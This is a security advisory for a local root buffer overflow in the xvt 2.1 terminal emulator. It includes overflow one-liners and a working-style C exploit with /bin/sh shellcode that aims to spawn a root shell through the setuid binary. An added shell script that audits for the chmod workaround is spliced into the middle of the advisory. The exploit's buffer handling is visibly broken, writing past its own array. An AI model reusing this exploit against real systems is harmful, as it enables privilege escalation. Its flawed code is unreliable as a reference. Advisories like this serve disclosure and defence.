Xvt is an X terminal-emulator that is designed to be more or less compatible with xterm while using much less swap space. It is mainly intended for use at sites that use large numbers of X terminals but may also be useful on single workstations that are short of memory. The main way that xvt achieves its small size is by avoiding the use of the X toolkit. A security vulnerability in the product allows an attacker to overflow one of the program's internal buffers, causing it to execute arbitrary code.
Credit:
The information has been provided by BAILLEUX Christophe.
Vulnerable systems:
Xvt version 2.1
Xvt contains a buffer overrun condition that is triggered by passing an overly long argument to xvt's -T and -name command-line options. Since xvt is installed setuid root by default, a normal user can pass a carefully crafted argument to xvt such that xvt executes a root shell.
Examples:
$ xvt -name `perl -e 'print "A"x234'`
$ xvt -T `perl -e 'print "A"x262'`
Workaround:
As a temporary measure, remove the setuid-root bit from the program:
# chmod u-s /usr/bin/X11/xvt
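To confirm the workaround took effect and to catch other setuid copies of the binary, a check along these lines can be used. This is an added example, not part of the original advisory; the function names and the search directories given on the command line are assumptions, and only /usr/bin/X11/xvt comes from the advisory.

```shell
#!/bin/sh
# Added example, not from the advisory: confirm the "chmod u-s" workaround and
# look for other setuid copies of the binary. Search directories are assumptions.

# Print regular files named NAME under DIR that still carry the setuid bit.
# OWNER defaults to root; another user can be passed to test unprivileged.
find_setuid_copies() {
    name=$1 dir=$2 owner=${3:-root}
    find "$dir" -type f -name "$name" -user "$owner" -perm -4000 2>/dev/null
}

# 0 = file present without setuid bit, 1 = bit still set, 2 = file missing.
workaround_status() {
    [ -f "$1" ] || return 2
    if [ -u "$1" ]; then return 1; fi
    return 0
}

# Check the advisory's path, then scan each directory given as an argument.
audit_xvt() {
    target=/usr/bin/X11/xvt   # path taken from the advisory
    rc=0
    workaround_status "$target" || rc=$?
    case $rc in
        0) echo "OK: $target is not setuid" ;;
        1) echo "WORKAROUND MISSING: $target is still setuid" ;;
        2) echo "INFO: $target is not installed" ;;
    esac
    for dir in "$@"; do
        find_setuid_copies xvt "$dir" | while IFS= read -r f; do
            echo "setuid copy: $f"
        done
    done
    [ "$rc" -ne 1 ]
}

# Run the audit only when directories are supplied, e.g. ./audit.sh /usr /opt
if [ "$#" -gt 0 ]; then audit_xvt "$@"; fi
```

The audit exits non-zero only when the advisory's path is still setuid, so it can gate a configuration-management run.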
Exploit:
/*
/usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.
tshaw:~$ ./expl
bash#
*/
#include <stdio.h>
#include <stdlib.h>
int main()
{
char buf[234];
int i;
char code[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
for(i=0; i<76; i++)
buf[i] = 0x41;
*(long *)&buf[76]=0xbffffab0; /* ret addr */
memset(buf + 80, 0x90, 234);
memcpy(buf + 233 - strlen(code), code, strlen(code));
buf[234] = '\0';
execl("/usr/bin/X11/xvt", "xvt", "-name", buf, 0);
}